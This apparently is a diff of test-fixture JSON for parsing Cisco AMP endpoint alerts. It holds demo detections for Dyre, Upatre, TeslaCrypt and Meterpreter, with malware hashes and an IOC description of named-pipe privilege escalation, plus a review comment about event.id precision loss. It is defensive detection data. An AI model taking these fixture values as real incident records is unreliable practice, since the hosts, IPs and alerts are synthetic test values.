"ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 245952, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:54.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533667841684537367", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 532000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533667841684537000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": 
"Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 247271, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:53.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258118058508361", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 636000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258118058508000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 
251240, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:53.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533667837389570068", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 689000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533667837389570000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 252559, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - 
"related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:41.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258066518900808", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 608000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258066518901000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 253878, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:29.000Z", - "cisco.amp.computer.active": true, - 
"cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258014979293255", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 581000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258014979293000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 255197, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:17.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - 
"cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257963439685702", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 569000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176257963439686000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 256516, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:12:53.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533667579691532307", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - 
"63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 778000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" + "e1:e5:94:ea:a5:44" ], + "cisco.amp.timestamp_nanoseconds": 900000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 6533667579691532000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "event.id": 6180341055704007000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 257835, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], + "log.offset": 22893, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + 
"process.name": "iexplore.exe", + "process.pid": 3136, "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Upatre" ], "related.ip": [ + "10.10.0.0", + "8.8.4.4", "8.8.8.8", "10.10.10.10" ], 
@@ -4353,64 +700,71 @@ "user@testdomain.com" ], "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55807, "tags": [ "cisco-amp", "forwarded" ] }, { - "@timestamp": "2021-01-15T10:12:52.000Z", + "@timestamp": "2021-01-15T10:37:43.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" + "mac": "e1:e5:94:ea:a5:44" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.DFC.MalParent", - "cisco.amp.detection_id": "6533667575396565008", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.detection": "DFC.CustomIPList", + "cisco.amp.detection_id": "6180341055704006658", + "cisco.amp.event_type_id": 1090519084, "cisco.amp.group_guids": [ "test_group_guid" ], + "cisco.amp.network_info.nfm.direction": "Outgoing connection from", + "cisco.amp.network_info.parent.disposition": "Clean", "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 971000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" + "e1:e5:94:ea:a5:44" ], + "cisco.amp.timestamp_nanoseconds": 869000000, + "destination.as.number": 15169, + "destination.as.organization.name": "Google LLC", + "destination.geo.continent_name": "North America", + "destination.geo.country_iso_code": "US", + "destination.geo.country_name": "United States", + "destination.geo.location.lat": 37.751, + "destination.geo.location.lon": -97.822, + "destination.ip": "8.8.4.4", + "destination.port": 443, + "event.action": "DFC Threat Detected", "event.dataset": "cisco.amp", - "event.id": 6533667575396565000, + "event.id": 6180341055704007000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": 
"b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", + "event.severity": 3, "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", + "host.hostname": "Demo_Upatre", + "host.name": "Demo_Upatre", "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 261804, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], + "log.offset": 24346, + "network.direction": "egress", + "network.transport": "TCP", + "process.hash.md5": "b3581f426dc500a51091cdd5bacf0454", + "process.hash.sha1": "8de30174cebc8732f1ba961e7d93fe5549495a80", + "process.hash.sha256": "b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132", + "process.name": "iexplore.exe", + "process.pid": 3136, "related.hosts": [ - "Demo_AMP_Threat_Audit" + "Demo_Upatre" ], "related.ip": [ + "10.10.0.0", + "8.8.4.4", "8.8.8.8", "10.10.10.10" ], 
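Review bot: The new `event.id` in this hunk is a float-rounded copy of the detection id: `"cisco.amp.detection_id": "6180341055704006658"` is kept intact as a string, but `"event.id": 6180341055704007000` has lost its low digits, which suggests the value passed through a 64-bit double somewhere between the connector payload and this expected output. The same rounding makes three distinct detections in the later hunks (`detection_id` 6533670191031648309, ...308 and ...307 at the @@ -4590, @@ -4651 and @@ -4712 hunks) all serialize as the identical `"event.id": 6533670191031648000`, so the field cannot be used to de-duplicate or correlate those alerts. Whether the rounding happens in the ingest pipeline or only in the test harness that writes this fixture is not visible here; either way the expected output should carry `event.id` as a string copy of the full detection id, e.g. `"event.id": "6180341055704006658"`, so a regression in precision would fail the test rather than be baked into it. The enclosing JSON array starts and ends outside this hunk.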
@@ -4418,61 +772,61 @@ "user@testdomain.com" ], "service.type": "cisco", + "source.ip": "10.10.0.0", + "source.port": 55806, "tags": [ "cisco-amp", "forwarded" ] }, { - "@timestamp": "2021-01-15T10:12:49.000Z", + "@timestamp": "2021-01-15T10:32:58.000Z", + "cisco.amp.cloud_ioc.description": "A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.", + "cisco.amp.cloud_ioc.short_description": "W32.PossibleNamedPipeImpersonation.ioc", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "27:85:29:21:67:49" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257843180601413", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "27:85:29:21:67:49" ], - "cisco.amp.timestamp_nanoseconds": 536000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 322000000, + "event.action": "Cloud IOC", "event.category": [ - "file", - "malware" + "file" ], "event.dataset": "cisco.amp", - "event.id": 6176257843180601000, + "event.id": 1476910664322001000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": 
"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "event.severity": 3, + "event.start": "2021-01-15T10:32:58.000Z", + "file.hash.sha256": "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2", + "file.name": "cmd.exe", + "file.path": "/C:/WINDOWS/system32/cmd.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_Command_Line_Arguments_Meterpreter", + "host.name": "Demo_Command_Line_Arguments_Meterpreter", "input.type": "log", - "log.offset": 263122, + "log.offset": 25799, + "process.hash.sha256": "69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9", "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2" ], "related.hosts": [ - "Demo_Dyre" + "Demo_Command_Line_Arguments_Meterpreter" ], "related.ip": [ "8.8.8.8", 
@@ -4485,43 +839,66 @@ ] }, { - "@timestamp": "2021-01-15T10:12:48.000Z", + "@timestamp": "2021-01-15T10:27:39.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "f5:8f:96:c3:53:1c" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.event_type_id": 553648166, + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533671385032556606", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "f5:8f:96:c3:53:1c" + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 25000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" ], - "cisco.amp.timestamp_nanoseconds": 82375000, - "event.action": "Uninstall", "event.dataset": "cisco.amp", - "event.id": 834324, + "event.id": 6533671385032557000, "event.kind": "alert", "event.module": "cisco", - "event.severity": 0, + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_AMP_Exploit_Prevention", - "host.name": "Demo_AMP_Exploit_Prevention", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", "input.type": "log", - "log.offset": 264441, + "log.offset": 27431, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + 
"b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], "related.hosts": [ - "Demo_AMP_Exploit_Prevention" + "Demo_AMP_Threat_Audit" ], "related.ip": [ "8.8.8.8", "10.10.10.10" ], + "related.user": [ + "user@testdomain.com" + ], "service.type": "cisco", "tags": [ "cisco-amp", 
@@ -4529,55 +906,50 @@ ] }, { - "@timestamp": "2021-01-15T10:12:37.000Z", + "@timestamp": "2021-01-15T10:24:58.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "90:61:b5:c9:13:79" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257791640993860", - "cisco.amp.event_type_id": 1090519054, + "cisco.amp.detection": "W32.3372C1EDAB-100.SBX.TG", + "cisco.amp.event_type_id": 1107296258, "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "90:61:b5:c9:13:79" ], - "cisco.amp.timestamp_nanoseconds": 898000000, - "event.action": "Threat Detected", + "cisco.amp.timestamp_nanoseconds": 329000000, + "event.action": "Multiple Infected Files", "event.category": [ - "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257791640994000, + "event.id": 1489955900329000200, "event.kind": "alert", "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "event.severity": 3, + "event.start": "2021-01-15T10:24:58.000Z", + "file.hash.sha256": "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_TeslaCrypt", + "host.name": "Demo_TeslaCrypt", "input.type": "log", - "log.offset": 265349, + "log.offset": 28756, + 
"process.hash.sha256": "9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad", "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + "3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370" ], "related.hosts": [ - "Demo_Dyre" + "Demo_TeslaCrypt" ], "related.ip": [ "8.8.8.8", 
@@ -4590,60 +962,66 @@ ] }, { - "@timestamp": "2021-01-15T10:12:25.000Z", + "@timestamp": "2021-01-15T10:23:01.000Z", "cisco.amp.computer.active": true, "cisco.amp.computer.connector_guid": "test_connector_guid", "cisco.amp.computer.external_ip": "8.8.8.8", "cisco.amp.computer.network_addresses": [ { "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" + "mac": "63:5f:47:2b:89:91" } ], "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176257740101386307", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533670191031648309", "cisco.amp.event_type_id": 1090519054, "cisco.amp.file.disposition": "Malicious", "cisco.amp.group_guids": [ "test_group_guid" ], "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" + "63:5f:47:2b:89:91" ], - "cisco.amp.timestamp_nanoseconds": 901000000, + "cisco.amp.timestamp_nanoseconds": 947000000, "event.action": "Threat Detected", "event.category": [ "file", "malware" ], "event.dataset": "cisco.amp", - "event.id": 6176257740101386000, + "event.id": 6533670191031648000, "event.kind": "alert", "event.module": "cisco", "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + 
